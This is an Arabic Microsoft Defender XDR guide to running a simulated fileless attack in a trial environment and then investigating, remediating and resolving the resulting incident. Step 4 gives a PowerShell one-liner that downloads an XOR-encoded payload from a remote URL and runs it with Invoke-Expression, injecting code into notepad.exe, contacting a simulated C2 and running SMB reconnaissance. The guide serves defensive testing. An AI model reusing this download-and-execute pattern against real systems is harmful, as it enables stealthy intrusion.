تشغيل محاكاة هجوم في بيئة تجريبية Microsoft Defender XDR

  • مقالة

هذه المقالة هي الخطوة 1 من 2 في عملية إجراء تحقيق والاستجابة لحادث في Microsoft Defender XDR باستخدام بيئة تجريبية. لمزيد من المعلومات حول هذه العملية، راجع مقالة النظرة العامة .

بعد إعداد بيئتك التجريبية، حان الوقت لاختبار استجابة Microsoft Defender XDR للحوادث وقدرات التحقيق والمعالجة التلقائية من خلال إنشاء حادث بهجوم محاكاة واستخدام مدخل Microsoft Defender للتحقيق والاستجابة.

الحادث في Microsoft Defender XDR هو مجموعة من التنبيهات المرتبطة والبيانات المرتبطة التي تشكل قصة الهجوم.

تنشئ خدمات وتطبيقات Microsoft 365 تنبيهات عندما تكتشف حدثا أو نشاطا مشبوها أو ضارا. توفر التنبيهات الفردية أدلة قيمة حول هجوم مكتمل أو مستمر. ومع ذلك، تستخدم الهجمات عادة تقنيات مختلفة ضد أنواع مختلفة من الكيانات، مثل الأجهزة والمستخدمين وعلب البريد. والنتيجة هي تنبيهات متعددة لكيانات متعددة في المستأجر الخاص بك.

ملاحظة

إذا كنت جديدا على تحليل الأمان والاستجابة للحوادث، فراجع معاينة الاستجابة للحوادث الأولى للحصول على جولة إرشادية لعملية نموذجية من التحليل والمعالجة ومراجعة ما بعد الحادث.

محاكاة الهجمات باستخدام مدخل Microsoft Defender

يحتوي مدخل Microsoft Defender على قدرات مضمنة لإنشاء هجمات محاكاة على بيئتك التجريبية:

Defender لـ Office 365 التدريب على محاكاة الهجوم

تتضمن Defender لـ Office 365 مع Microsoft 365 E5 أو Microsoft Defender لـ Office 365 الخطة 2 التدريب على محاكاة الهجوم لهجمات التصيد الاحتيالي. الخطوات الأساسية هي:

  1. الإنشاء محاكاة

    للحصول على إرشادات خطوة بخطوة حول كيفية إنشاء محاكاة جديدة وتشغيلها، راجع محاكاة هجوم التصيد الاحتيالي.

  2. الإنشاء حمولة

    للحصول على إرشادات خطوة بخطوة حول كيفية إنشاء حمولة للاستخدام داخل المحاكاة، راجع الإنشاء حمولة مخصصة لتدريب محاكاة الهجوم.

  3. الحصول على رؤى

    للحصول على إرشادات خطوة بخطوة حول كيفية الحصول على رؤى مع إعداد التقارير، راجع الحصول على رؤى من خلال التدريب على محاكاة الهجوم.

لمزيد من المعلومات، راجع المحاكاة.

برامج Defender لهجمات نقطة النهاية التعليمية & المحاكاة

فيما يلي محاكاة Defender لنقطة النهاية من Microsoft:

  • المستند يسقط الواجهة الخلفية
  • التحقيق التلقائي (الجزء الخلفي)

هناك عمليات محاكاة إضافية من مصادر الجهات الخارجية. هناك أيضا مجموعة من البرامج التعليمية.

لكل محاكاة أو برنامج تعليمي:

  1. قم بتنزيل مستند التنقل المطابق المتوفر وقراءته.

  2. قم بتنزيل ملف المحاكاة. يمكنك اختيار تنزيل الملف أو البرنامج النصي على جهاز الاختبار ولكنه ليس إلزاميا.

  3. قم بتشغيل ملف المحاكاة أو البرنامج النصي على جهاز الاختبار كما هو موضح في مستند التنقل.

لمزيد من المعلومات، راجع تجربة Microsoft Defender لنقطة النهاية من خلال هجوم محاكاة.

محاكاة هجوم باستخدام وحدة تحكم مجال معزولة وجهاز عميل (اختياري)

في هذا التمرين الاختياري للاستجابة للحوادث، ستقوم بمحاكاة هجوم على وحدة تحكم مجال خدمات مجال Active Directory معزولة (AD DS) وجهاز Windows باستخدام برنامج نصي PowerShell ثم التحقيق في الحادث ومعالجته وحله.

أولا، تحتاج إلى إضافة نقاط نهاية إلى بيئتك التجريبية.

إضافة نقاط نهاية بيئة تجريبية

أولا، تحتاج إلى إضافة وحدة تحكم مجال AD DS معزولة وجهاز Windows إلى بيئتك التجريبية.

  1. تحقق من تمكين مستأجر البيئة التجريبية Microsoft Defender XDR.

  2. تحقق من أن وحدة التحكم بالمجال:

  3. تحقق من أن جهاز الاختبار الخاص بك:

إذا كنت تستخدم مجموعات المستأجر والجهاز، فقم بإنشاء مجموعة أجهزة مخصصة لجهاز الاختبار ودفعها إلى المستوى الأعلى.

أحد البدائل هو استضافة وحدة تحكم مجال AD DS واختبار الجهاز كأجهزة ظاهرية في خدمات البنية الأساسية ل Microsoft Azure. يمكنك استخدام الإرشادات الواردة في المرحلة 1 من دليل مختبر اختبار المؤسسة المحاكي، ولكن تخطي إنشاء الجهاز الظاهري APP1.

فيما يلي النتيجة.

بيئة التقييم باستخدام دليل مختبر اختبار المؤسسة المحاكي

ستقوم بمحاكاة هجوم متطور يستفيد من التقنيات المتقدمة للاختباء من الكشف. يعدد الهجوم جلسات Server Message Block (SMB) المفتوحة على وحدات التحكم بالمجال ويسترد عناوين IP الأخيرة لأجهزة المستخدمين. لا تتضمن هذه الفئة من الهجمات عادة الملفات التي تم إسقاطها على جهاز الضحية وتحدث فقط في الذاكرة. إنهم "يعيشون خارج الأرض" باستخدام النظام الحالي والأدوات الإدارية وإدخال التعليمات البرمجية الخاصة بهم في عمليات النظام لإخفاء تنفيذها. يسمح لهم هذا السلوك بالتهرب من الكشف والاستمرار على الجهاز.

في هذه المحاكاة، يبدأ سيناريو العينة الخاص بنا مع برنامج نصي PowerShell. في العالم الحقيقي، قد يتم خداع المستخدم لتشغيل برنامج نصي أو قد يتم تشغيل البرنامج النصي من اتصال بعيد بكمبيوتر آخر من جهاز مصاب مسبقا، ما يشير إلى أن المهاجم يحاول الانتقال أفقيا في الشبكة. قد يكون الكشف عن هذه البرامج النصية صعبا لأن المسؤولين غالبا ما يقومون بتشغيل البرامج النصية عن بعد لتنفيذ أنشطة إدارية مختلفة.

هجوم PowerShell بلا ملف مع حقن العملية وهجوم استطلاع SMB

أثناء المحاكاة، يضخ الهجوم shellcode في عملية تبدو بريئة. يتطلب السيناريو استخدام notepad.exe. اخترنا هذه العملية للمحاكاة، ولكن من المرجح أن يستهدف المهاجمون عملية نظام طويلة الأمد، مثل svchost.exe. ثم ينتقل shellcode للاتصال بخادم الأوامر والتحكم (C2) للمهاجم لتلقي إرشادات حول كيفية المتابعة. يحاول البرنامج النصي تنفيذ استعلامات الاستطلاع مقابل وحدة تحكم المجال (DC). يسمح الاستطلاع للمهاجم بالحصول على معلومات حول معلومات تسجيل دخول المستخدم الأخيرة. بمجرد حصول المهاجمين على هذه المعلومات، يمكنهم التنقل أفقيا في الشبكة للوصول إلى حساب حساس معين

هام

للحصول على أفضل النتائج، اتبع تعليمات محاكاة الهجوم عن كثب قدر الإمكان.

تشغيل محاكاة هجوم وحدة تحكم مجال AD DS المعزولة

لتشغيل محاكاة سيناريو الهجوم:

  1. تأكد من أن بيئتك التجريبية تتضمن وحدة تحكم مجال AD DS المعزولة وجهاز Windows.

  2. سجل الدخول إلى جهاز الاختبار باستخدام حساب مستخدم الاختبار.

  3. افتح نافذة Windows PowerShell على جهاز الاختبار.

  4. انسخ البرنامج النصي للمحاكاة التالي:

    [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
;$xor = [System.Text.Encoding]::UTF8.GetBytes('WinATP-Intro-Injection');
$base64String = (Invoke-WebRequest -URI "https://wcdstaticfilesprdeus.blob.core.windows.net/wcdstaticfiles/MTP_Fileless_Recon.txt" -UseBasicParsing).Content;Try{ $contentBytes = [System.Convert]::FromBase64String($base64String) } Catch { $contentBytes = [System.Convert]::FromBase64String($base64String.Substring(3)) };$i = 0;
$decryptedBytes = @();$contentBytes.foreach{ $decryptedBytes += $_ -bxor $xor[$i];
$i++; if ($i -eq $xor.Length) {$i = 0} };Invoke-Expression ([System.Text.Encoding]::UTF8.GetString($decryptedBytes))

    ملاحظة

    إذا فتحت هذه المقالة على مستعرض ويب، فقد تواجه مشكلات في نسخ النص الكامل دون فقدان أحرف معينة أو إدخال فواصل أسطر إضافية. إذا كان الأمر كذلك، فبادر بتنزيل هذا المستند وفتحه على Adobe Reader.

  5. الصق البرنامج النصي المنسخ وتشغيله في نافذة PowerShell.

ملاحظة

إذا كنت تقوم بتشغيل PowerShell باستخدام بروتوكول سطح المكتب البعيد (RDP)، فاستخدم الأمر Type Clipboard Text في عميل RDP لأن أسلوب CTRL-V hotkey أو النقر بزر الماوس الأيمن فوق اللصق قد لا يعمل. في بعض الأحيان، لن تقبل الإصدارات الأخيرة من PowerShell هذا الأسلوب أيضا، فقد تضطر إلى النسخ إلى المفكرة في الذاكرة أولا، ونسخها في الجهاز الظاهري، ثم لصقها في PowerShell.

بعد بضع ثوان، سيتم فتح تطبيق المفكرة. سيتم إدخال رمز هجوم محاكاة في المفكرة. احتفظ بمثيل المفكرة الذي تم إنشاؤه تلقائيا مفتوحا لتجربة السيناريو الكامل.

سيحاول رمز الهجوم المحاكي الاتصال بعنوان IP خارجي (محاكاة خادم C2) ثم محاولة الاستطلاع ضد وحدة تحكم المجال من خلال SMB.

سترى هذه الرسالة معروضة على وحدة تحكم PowerShell عند اكتمال هذا البرنامج النصي:

ran NetSessionEnum against [DC Name] with return code result 0

لمشاهدة ميزة الحوادث والاستجابة التلقائية قيد التنفيذ، احتفظ بعملية notepad.exe مفتوحة. سترى الحوادث والاستجابة التلقائية توقف عملية المفكرة.

التحقيق في الحادث الخاص بهجوم المحاكاة

ملاحظة

قبل أن نرشدك خلال هذه المحاكاة، شاهد الفيديو التالي لمعرفة كيف تساعدك إدارة الحوادث على تجميع التنبيهات ذات الصلة معا كجزء من عملية التحقيق، حيث يمكنك العثور عليها في المدخل، وكيف يمكن أن تساعدك في عمليات الأمان الخاصة بك:

بالتبديل إلى وجهة نظر محلل SOC، يمكنك الآن البدء في التحقيق في الهجوم في مدخل Microsoft Defender.

  1. افتح مدخل Microsoft Defender.

  2. من جزء التنقل، حدد Incidents & Alerts > Incidents.

  3. سيظهر الحدث الجديد للهجوم المحاكي في قائمة انتظار الحدث.

    مثال على قائمة انتظار الحوادث

التحقيق في الهجوم كحادث واحد

يربط Microsoft Defender XDR التحليلات ويجمع جميع التنبيهات والتحقيقات ذات الصلة من منتجات مختلفة في كيان حادث واحد. من خلال القيام بذلك، يعرض Microsoft Defender XDR قصة هجوم أوسع، مما يسمح لمحلل SOC بفهم التهديدات المعقدة والاستجابة لها.

ترتبط التنبيهات التي تم إنشاؤها أثناء هذه المحاكاة بنفس التهديد، ونتيجة لذلك، يتم تجميعها تلقائيا كحادث واحد.

لعرض الحادث:

  1. افتح مدخل Microsoft Defender.

  2. من جزء التنقل، حدد Incidents & Alerts > Incidents.

  3. حدد أحدث عنصر بالنقر فوق الدائرة الموجودة على يسار اسم الحدث. تعرض اللوحة الجانبية معلومات إضافية حول الحادث، بما في ذلك جميع التنبيهات ذات الصلة. لكل حادث اسم فريد يصفه استنادا إلى سمات التنبيهات التي يتضمنها.

    يمكن تصفية التنبيهات المعروضة في لوحة المعلومات استنادا إلى موارد الخدمة: Microsoft Defender for Identity، Microsoft Defender for Cloud Apps، Microsoft Defender لنقطة النهاية، Microsoft Defender XDR و Microsoft Defender لـ Office 365

  4. حدد فتح صفحة الحدث للحصول على مزيد من المعلومات حول الحادث.

    في صفحة Incident ، يمكنك مشاهدة جميع التنبيهات والمعلومات المتعلقة بالحادث. تتضمن المعلومات الكيانات والأصول المشاركة في التنبيه، ومصدر الكشف عن التنبيهات (مثل Microsoft Defender for Identity أو Microsoft Defender لنقطة النهاية)، وسبب ربطها معا. تظهر مراجعة قائمة تنبيه الحدث تقدم الهجوم. من طريقة العرض هذه، يمكنك مشاهدة التنبيهات الفردية والتحقيق فيها.

    يمكنك أيضا النقر فوق إدارة الحادث من القائمة اليمنى، لوضع علامة على الحادث، وتعيينه لنفسك، وإضافة تعليقات.

مراجعة التنبيهات التي تم إنشاؤها

لنلق نظرة على بعض التنبيهات التي تم إنشاؤها أثناء هجوم المحاكاة.

ملاحظة

سنمر عبر عدد قليل فقط من التنبيهات التي تم إنشاؤها أثناء هجوم المحاكاة. اعتمادا على إصدار Windows ومنتجات Microsoft Defender XDR التي تعمل على جهاز الاختبار الخاص بك، قد ترى المزيد من التنبيهات التي تظهر بترتيب مختلف قليلا.

مثال على تنبيه تم إنشاؤه

تنبيه: تمت ملاحظة إدخال العملية المشبوهة (المصدر: Microsoft Defender لنقطة النهاية)

يستخدم المهاجمون المتقدمون أساليب متطورة وخفية للاستمرار في الذاكرة والاختباء من أدوات الكشف. إحدى التقنيات الشائعة هي العمل من داخل عملية نظام موثوق بها بدلا من تنفيذ ضار، ما يجعل من الصعب على أدوات الكشف وعمليات الأمان اكتشاف التعليمات البرمجية الضارة.

للسماح لمحللي SOC بالقبض على هذه الهجمات المتقدمة، توفر مستشعرات الذاكرة العميقة في Microsoft Defender لنقطة النهاية خدمة السحابة لدينا رؤية غير مسبوقة لمجموعة متنوعة من تقنيات حقن التعليمات البرمجية عبر العمليات. يوضح الشكل التالي كيفية اكتشاف Defender لنقطة النهاية وتنبيهه عند محاولة إدخال التعليمات البرمجية إلى notepad.exe.

مثال على التنبيه لإدخال تعليمة برمجية يحتمل أن تكون ضارة

تنبيه: سلوك غير متوقع تمت ملاحظته بواسطة عملية يتم تشغيلها بدون وسيطات سطر الأوامر (المصدر: Microsoft Defender لنقطة النهاية)

غالبا ما تستهدف عمليات الكشف Microsoft Defender لنقطة النهاية السمة الأكثر شيوعا لتقنية الهجوم. يضمن هذا الأسلوب القدرة على الصمود ويرفع الشريط للمهاجمين للتبديل إلى تكتيكات أحدث.

نحن نستخدم خوارزميات تعلم واسعة النطاق لتأسيس السلوك العادي للعمليات الشائعة داخل المؤسسة وفي جميع أنحاء العالم ومراقبة متى تظهر هذه العمليات سلوكيات شاذة. غالبا ما تشير هذه السلوكيات الشاذة إلى أنه تم تقديم تعليمات برمجية غريبة ويتم تشغيلها في عملية موثوق بها بخلاف ذلك.

بالنسبة لهذا السيناريو، تظهر العمليةnotepad.exe سلوكا غير طبيعي، يتضمن الاتصال بموقع خارجي. هذه النتيجة مستقلة عن الأسلوب المحدد المستخدم لتقديم التعليمات البرمجية الضارة وتنفيذها.

ملاحظة

نظرا لأن هذا التنبيه يستند إلى نماذج التعلم الآلي التي تتطلب معالجة خلفية إضافية، فقد يستغرق الأمر بعض الوقت قبل أن ترى هذا التنبيه في المدخل.

لاحظ أن تفاصيل التنبيه تتضمن عنوان IP الخارجي — وهو مؤشر يمكنك استخدامه كمحور لتوسيع التحقيق.

حدد عنوان IP في شجرة عملية التنبيه لعرض صفحة تفاصيل عنوان IP.

مثال على السلوك غير المتوقع بواسطة عملية يتم تشغيلها بدون وسيطات سطر الأوامر

يعرض الشكل التالي صفحة تفاصيل عنوان IP المحدد (النقر فوق عنوان IP في شجرة معالجة التنبيه).

مثال على صفحة تفاصيل عنوان IP

تنبيه: استكشاف عنوان المستخدم وعنوان IP (SMB) (المصدر: Microsoft Defender for Identity)

يتيح التعداد باستخدام بروتوكول Server Message Block (SMB) للمهاجمين الحصول على معلومات تسجيل دخول المستخدم الأخيرة التي تساعدهم على التنقل أفقيا عبر الشبكة للوصول إلى حساب حساس معين.

في هذا الكشف، يتم تشغيل تنبيه عند تشغيل تعداد جلسة SMB مقابل وحدة تحكم المجال.

مثال على تنبيه Microsoft Defender for Identity لاستطلاع عنوان IP والمستخدم

مراجعة المخطط الزمني للجهاز باستخدام Microsoft Defender لنقطة النهاية

بعد استكشاف التنبيهات المختلفة في هذا الحادث، انتقل مرة أخرى إلى صفحة الحادث التي حققت فيها سابقا. حدد علامة التبويب الأجهزة في صفحة الحدث لمراجعة الأجهزة المتضمنة في هذا الحادث كما تم الإبلاغ عنها بواسطة Microsoft Defender لنقطة النهاية Microsoft Defender for Identity.

حدد اسم الجهاز الذي تم فيه الهجوم، لفتح صفحة الكيان لهذا الجهاز المحدد. في تلك الصفحة، يمكنك مشاهدة التنبيهات التي تم تشغيلها والأحداث ذات الصلة.

حدد علامة التبويب اليوميات لفتح المخطط الزمني للجهاز وعرض جميع الأحداث والسلوكيات التي تمت ملاحظتها على الجهاز بترتيب زمني، متداخلة مع التنبيهات التي تم رفعها.

مثال على المخطط الزمني للجهاز مع السلوكيات

يوفر توسيع بعض السلوكيات الأكثر إثارة للاهتمام تفاصيل مفيدة، مثل أشجار العمليات.

على سبيل المثال، قم بالتمرير لأسفل حتى تعثر على حدث التنبيه الذي تمت ملاحظته إدخال عملية مشبوهة. حدد powershell.exe التي تم إدخالها في حدث العملية notepad.exe أسفله، لعرض شجرة العملية الكاملة لهذا السلوك ضمن الرسم البياني لكيانات الحدث في الجزء الجانبي. استخدم شريط البحث للتصفية إذا لزم الأمر.

مثال على شجرة المعالجة لسلوك إنشاء ملف PowerShell المحدد

مراجعة معلومات المستخدم باستخدام Microsoft Defender for Cloud Apps

في صفحة الحدث، حدد علامة التبويب Users لعرض قائمة المستخدمين المشاركين في الهجوم. يحتوي الجدول على معلومات إضافية حول كل مستخدم، بما في ذلك درجة أولوية التحقيق لكل مستخدم.

حدد اسم المستخدم لفتح صفحة ملف تعريف المستخدم حيث يمكن إجراء مزيد من التحقيق. اقرأ المزيد حول التحقيق في المستخدمين الخطرين.

صفحة مستخدم Defender for Cloud Apps

التحقيق والمعالجة التلقائية

ملاحظة

قبل أن نرشدك خلال هذه المحاكاة، شاهد الفيديو التالي للتعرف على ما هو الإصلاح الذاتي التلقائي، ومكان العثور عليه في المدخل، وكيف يمكن أن يساعد في عمليات الأمان الخاصة بك:

انتقل مرة أخرى إلى الحدث في مدخل Microsoft Defender. تعرض علامة التبويب Investigations في صفحة Incident التحقيقات التلقائية التي تم تشغيلها بواسطة Microsoft Defender for Identity Microsoft Defender لنقطة النهاية. تعرض لقطة الشاشة أدناه التحقيق التلقائي الذي تم تشغيله بواسطة Defender لنقطة النهاية فقط. بشكل افتراضي، يقوم Defender لنقطة النهاية تلقائيا بلمعالجة البيانات الاصطناعية الموجودة في قائمة الانتظار، ما يتطلب المعالجة.

مثال على التحقيقات الآلية المتعلقة بالحادث

حدد التنبيه الذي أدى إلى إجراء تحقيق لفتح صفحة تفاصيل التحقيق . سترى التفاصيل التالية:

  • التنبيه (التنبيهات) التي أدت إلى التحقيق التلقائي.
  • المستخدمون والأجهزة المتأثرة. إذا تم العثور على مؤشرات على أجهزة إضافية، فسيتم سرد هذه الأجهزة الإضافية أيضا.
  • قائمة الأدلة. تم العثور على الكيانات وتحليلها، مثل الملفات والعمليات والخدمات وبرامج التشغيل وعناوين الشبكة. يتم تحليل هذه الكيانات للعلاقات المحتملة بالتنبيه وتصنيفها على أنها حميدة أو ضارة.
  • تم العثور على التهديدات. التهديدات المعروفة التي تم العثور عليها أثناء التحقيق.

ملاحظة

اعتمادا على التوقيت، قد لا يزال التحقيق التلقائي قيد التشغيل. انتظر بضع دقائق حتى تكتمل العملية قبل جمع الأدلة وتحليلها ومراجعة النتائج. قم بتحديث صفحة تفاصيل التحقيق للحصول على أحدث النتائج.

مثال على صفحة تفاصيل التحقيق

أثناء التحقيق التلقائي، حدد Microsoft Defender لنقطة النهاية عملية notepad.exe، التي تم إدخالها كأحد البيانات الاصطناعية التي تتطلب المعالجة. يوقف Defender لنقطة النهاية تلقائيا حقن العملية المشبوهة كجزء من المعالجة التلقائية.

يمكنك رؤية notepad.exe تختفي من قائمة العمليات قيد التشغيل على جهاز الاختبار.

حل الحادث

بعد اكتمال التحقيق وتأكيد معالجته، يمكنك حل الحادث.

من صفحة Incident ، حدد Manage incident. قم بتعيين الحالة إلى حل الحادث وحدد تنبيه صحيح للتصنيف واختبار الأمان للتحديد.

مثال على صفحة الحوادث مع لوحة إدارة الحوادث المفتوحة حيث يمكنك النقر فوق مفتاح التبديل لحل الحادث

عند حل الحادث، فإنه يحل جميع التنبيهات المقترنة في مدخل Microsoft Defender والمداخل ذات الصلة.

يختتم هذا عمليات محاكاة الهجوم لتحليل الحوادث والتحقيق التلقائي وحل الحوادث.

الخطوة التالية

قدرات الاستجابة للحوادث Microsoft Defender XDR

الخطوة 2 من 2: جرب Microsoft Defender XDR قدرات الاستجابة للحوادث

الإنشاء بيئة تقييم Microsoft Defender XDR

تلميح

هل تريد معرفة المزيد؟ تفاعل مع مجتمع أمان Microsoft في مجتمعنا التقني: Microsoft Defender XDR Tech Community.